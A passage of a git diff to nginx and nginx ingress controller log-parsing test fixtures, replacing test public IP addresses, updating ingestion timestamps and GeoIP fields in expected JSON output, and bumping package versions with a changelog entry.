"_tmp": {}, "related": { "ip": [ - "1.2.3.4" + "67.43.156.15" ] }, "http": { @@ -248,8 +254,8 @@ } }, "event": { - "ingested": "2021-06-09T13:15:11.704809900Z", - "original": "1.2.3.4 localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com localhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", + "ingested": "2021-12-09T13:41:43.172738700Z", + "original": "67.43.156.15 localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com localhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ diff --git a/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json b/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json index b6d06fe524e..76feff53fe3 100644 --- a/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json +++ b/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json @@ -20,7 +20,7 @@ "level": "error" }, "event": { - "ingested": "2021-06-09T13:15:11.834545200Z", + "ingested": "2021-12-09T13:41:43.902411600Z", "original": "2016/10/25 14:49:34 [error] 54053#0: *1 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/favicon.ico\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /favicon.ico HTTP/1.1\", host: \"localhost:8080\", referrer: \"http://localhost:8080/\"", "category": [ "web" @@ -56,7 +56,7 @@ "level": "error" }, "event": { - "ingested": "2021-06-09T13:15:11.834566800Z", + "ingested": "2021-12-09T13:41:43.902415500Z", "original": "2016/10/25 14:50:44 [error] 54053#0: *3 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/adsasd\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /adsasd HTTP/1.1\", host: \"localhost:8080\"", "category": [ "web" @@ -92,7 +92,7 @@ "level": "error" }, "event": { - "ingested": "2021-06-09T13:15:11.834572200Z", + "ingested": "2021-12-09T13:41:43.902420Z", "original": "2019/10/30 23:26:34 [error] 205860#205860: *180289 FastCGI sent in stderr: \"PHP message: PHP Warning: Declaration of FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) should be compatible with FEE_Field_Post::wrap($content, $post_id = 0) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0\nPHP message: PHP Warning: Declaration of FEE_Field_Tags::wrap($content, $before, $sep, $after) should be compatible with FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0\nPHP message: PHP Warning: Declaration of FEE_Field_Category::wrap($content, $sep, $parents) should be compatible with FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0", "category": [ "web" @@ -128,7 +128,7 @@ "level": "error" }, "event": { - "ingested": "2021-06-09T13:15:11.834576500Z", + "ingested": "2021-12-09T13:41:43.902426Z", "original": "2019/11/05 14:50:44 [error] 54053#0: *3 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/adsasd\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /pysio HTTP/1.1\", host: \"localhost:8080\"", "category": [ "web" diff --git a/packages/nginx/manifest.yml b/packages/nginx/manifest.yml index 1982ac0ce65..f40978a8339 100644 --- a/packages/nginx/manifest.yml +++ b/packages/nginx/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nginx title: Nginx -version: 1.2.1 +version: 1.2.2 license: basic description: Collect logs and metrics from Nginx HTTP servers with Elastic Agent. type: integration diff --git a/packages/nginx_ingress_controller/_dev/deploy/docker/ingress.log b/packages/nginx_ingress_controller/_dev/deploy/docker/ingress.log index 5e6c5370233..0406e65af30 100644 --- a/packages/nginx_ingress_controller/_dev/deploy/docker/ingress.log +++ b/packages/nginx_ingress_controller/_dev/deploy/docker/ingress.log @@ -13,10 +13,10 @@ 192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/products/42" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 325 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 2593a1126588922449c183c8d9ddbbeb 192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] "GET /products/42 HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 369 0.002 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 0f76ea730f282d5759018eb756b23b14 192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] "GET / HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 358 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 21efd18e3a7952fc78c0f2dcc1f05e69 -77.179.66.156 - - [07/Feb/2020:11:56:54 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b -77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d -77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/v2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789 -77.179.66.156 - - [07/Feb/2020:12:00:28 +0000] "GET /products/42?address=delhi+technological+university HTTP/1.1" 200 59 "-" "python-requests/2.22.0" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214 -77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79 -77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f -77.179.66.156 - - [07/Feb/2020:12:02:42 +0000] "GET /v2/some HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402 +67.43.156.13 - - [07/Feb/2020:11:56:54 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b +67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d +67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/v2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789 +67.43.156.13 - - [07/Feb/2020:12:00:28 +0000] "GET /products/42?address=delhi+technological+university HTTP/1.1" 200 59 "-" "python-requests/2.22.0" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214 +67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79 +67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f +67.43.156.13 - - [07/Feb/2020:12:02:42 +0000] "GET /v2/some HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402 diff --git a/packages/nginx_ingress_controller/changelog.yml b/packages/nginx_ingress_controller/changelog.yml index de5b987106e..a84f3d42a83 100644 --- a/packages/nginx_ingress_controller/changelog.yml +++ b/packages/nginx_ingress_controller/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Release nginx_ingress_controller package for v8.0.0 diff --git a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log index 5e6c5370233..0406e65af30 100644 --- a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log +++ b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log @@ -13,10 +13,10 @@ 192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/products/42" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 325 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 2593a1126588922449c183c8d9ddbbeb 192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] "GET /products/42 HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 369 0.002 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 0f76ea730f282d5759018eb756b23b14 192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] "GET / HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 358 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 21efd18e3a7952fc78c0f2dcc1f05e69 -77.179.66.156 - - [07/Feb/2020:11:56:54 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b -77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d -77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/v2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789 -77.179.66.156 - - [07/Feb/2020:12:00:28 +0000] "GET /products/42?address=delhi+technological+university HTTP/1.1" 200 59 "-" "python-requests/2.22.0" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214 -77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79 -77.179.66.156 - - [07/Feb/2020:12:02:38 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f -77.179.66.156 - - [07/Feb/2020:12:02:42 +0000] "GET /v2/some HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402 +67.43.156.13 - - [07/Feb/2020:11:56:54 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b +67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d +67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "http://hello-world.info/v2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789 +67.43.156.13 - - [07/Feb/2020:12:00:28 +0000] "GET /products/42?address=delhi+technological+university HTTP/1.1" 200 59 "-" "python-requests/2.22.0" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214 +67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] "GET /v2 HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79 +67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] "GET /favicon.ico HTTP/1.1" 200 59 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f +67.43.156.13 - - [07/Feb/2020:12:02:42 +0000] "GET /v2/some HTTP/1.1" 200 61 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402 diff --git a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json index 15c25d567d0..70287af6ce0 100644 --- a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json +++ b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json @@ -58,7 +58,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394839900Z", + "ingested": "2021-12-09T13:41:46.109908100Z", "original": "192.168.64.1 - - [07/Feb/2020:11:48:51 +0000] \"POST /products HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 89 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 529a007902362a5f51385a5fa7049884", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -137,7 +137,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394863300Z", + "ingested": "2021-12-09T13:41:46.109949200Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:15 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 91 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 68fa971ce4dfce685fdc01c877bfa645", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -216,7 +216,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394870700Z", + "ingested": "2021-12-09T13:41:46.109962300Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:30 +0000] \"DELETE /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 94 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 0be411044cb1cb67580e115413b2da60", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -295,7 +295,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394897200Z", + "ingested": "2021-12-09T13:41:46.109967300Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:43 +0000] \"PATCH /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 93 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 f479ab1d9cc8afcbac9e9f958ff8babc", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -361,7 +361,7 @@ "ip": "192.168.64.1" }, "event": { - "ingested": "2021-06-09T12:42:48.394903800Z", + "ingested": "2021-12-09T13:41:46.109978Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:50 +0000] \"PATCHp /products/42 HTTP/1.1\" 400 163 \"-\" \"-\" 0 0.000 [] [] - - - - 4c7d2079340e68353c7d0dfff00b904b", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -425,7 +425,7 @@ "ip": "192.168.64.1" }, "event": { - "ingested": "2021-06-09T12:42:48.394909100Z", + "ingested": "2021-12-09T13:41:46.109988500Z", "original": "192.168.64.1 - - [07/Feb/2020:11:50:09 +0000] \"geti /products/42 HTTP/1.1\" 400 163 \"-\" \"-\" 0 0.000 [] [] - - - - efb0c5aa8be6cdeb4a7e7bd090e3d893", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -502,7 +502,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394915Z", + "ingested": "2021-12-09T13:41:46.109993100Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:05 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Wget/1.20.3 (darwin18.6.0)\" 157 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 457b71c3e1ee1887bb809effd301a0ec", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -581,7 +581,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394920100Z", + "ingested": "2021-12-09T13:41:46.109998300Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:57 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 450 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 da29abf31e4d6324cebe5e7bca370709", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -666,7 +666,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394924900Z", + "ingested": "2021-12-09T13:41:46.110002800Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:57 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/products/42\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 381 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 e983c8cf3d713548baa50c9e2fffeb34", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -750,7 +750,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394929900Z", + "ingested": "2021-12-09T13:41:46.110008100Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:24 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 441 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 3d7ff18ff4181a7db5013a76f975d900", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -835,7 +835,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394935800Z", + "ingested": "2021-12-09T13:41:46.110020100Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:24 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 372 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 d131fe4bcd359cf947f75efca4bfa553", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -919,7 +919,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394940500Z", + "ingested": "2021-12-09T13:41:46.110201Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 369 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 ef6629fcaaa1ea0d1a843cf2bf40571d", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1004,7 +1004,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394945100Z", + "ingested": "2021-12-09T13:41:46.110205500Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/products/42\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 325 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 2593a1126588922449c183c8d9ddbbeb", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1088,7 +1088,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394949600Z", + "ingested": "2021-12-09T13:41:46.110210700Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 369 0.002 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 0f76ea730f282d5759018eb756b23b14", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1172,7 +1172,7 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394954100Z", + "ingested": "2021-12-09T13:41:46.110215800Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] \"GET / HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 358 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 21efd18e3a7952fc78c0f2dcc1f05e69", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1209,7 +1209,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web-8080", @@ -1225,26 +1225,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/favicon.ico" @@ -1258,7 +1240,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -1275,8 +1257,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394958800Z", - "original": "77.179.66.156 - - [07/Feb/2020:11:56:54 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b", + "ingested": "2021-12-09T13:41:46.110220400Z", + "original": "67.43.156.13 - - [07/Feb/2020:11:56:54 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "category": [ @@ -1312,7 +1294,7 @@ } }, "remote_ip_list": [ - "77.179.66.156" + "67.43.156.13" ], "upstream": { "name": "default-web2-8080", @@ -1328,26 +1310,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", - "location": { - "lon": 8.3639, - "lat": 49.2231 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "original": "/v2" @@ -1361,7 +1325,7 @@ }, "related": { "ip": [ - "77.179.66.156" + "67.43.156.13" ] }, "http": { @@ -1377,8 +1341,8 @@ } }, "event": { - "ingested": "2021-06-09T12:42:48.394963400Z", - "original": "77.179.66.156 - - [07/Feb/2020:11:56:56 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d", + "ingested": "2021-12-09T13:41:46.110226700Z", + "original": "67.43.156.13 - - 